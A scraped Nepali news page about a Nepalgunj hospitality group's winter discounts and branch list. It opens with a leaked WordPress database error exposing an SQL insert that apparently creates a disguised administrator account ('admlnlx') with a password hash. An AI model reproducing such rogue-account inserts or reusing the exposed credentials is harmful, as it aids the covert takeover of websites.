WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bt5WbJB8uHKH9cqEYzE13Anea9Tqqo/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 18:50:04', '', 'admlnlx', 'admlnlx')
नेपालगन्ज पुस ६ –
शिद्धार्थ बिजनेश ग्रुप अफ हस्पिटालिटी प्रालिले आफ्ना होटल,रिसोट तथा रेष्टुरेन्टहरुमा वीनटर अफर मार्फत परिकारहरुमा बिशेष छुट योजना ल्याएको छ । वीनटर अफर मार्फत होटलले पुसको पहिलो सातादेखि बिभिन्न स्बादिष्ट परिकारमा २५ प्रतिशत सम्म छुट दिन सुरु गरेको हो ।
चिकेन क्रिस्पी, फिस सिंगापुरे, झोल मम चिकेन,झोल मम भेज, तन्दुरी पिजा भेज, तन्दुरी पिजा चिकेन,र भेज जालीदारमा छुट पाइने छ ।त्यसै गरी शिद्धार्थ ग्रुपले आफ्ना माइलेज कार्ड होल्डर ग्राहकहरुकालागि वीनटर अफर मार्फत पुस महिनाभर प्रत्येक दिन एक पटक मसरुम सुप निशुल्क उपलब्ध गराउन सुरु गराउने ग्रुपका प्रबन्ध निर्देशक कृष्ण न्यौपानेले जानाकारी दिनुभयो ।
शिद्धार्थ गु्रप अफ हस्पिटालिटी प्रालिका टिकापुर, कैलाली चिसापानी, नेपालगन्ज, सुर्खेत,बुटबल, चुम्लिङटालर चितवन, काठमान्डौको सुन्धारा तिनकुने, पुरानो बानेश्बर र धोबीघाटमा गरी एक दर्जन बढी शाखाहरु रहेका छन । ती सबै शाखाहरुमा वीनटर अफर पुस महिनाभर रहने छ । नया ग्राहकहरुका लागि शिद्धार्थ गु्रपले माइलेज कार्ड बनाउने अभियान समेत सुरु गरेको जनाएको छ ।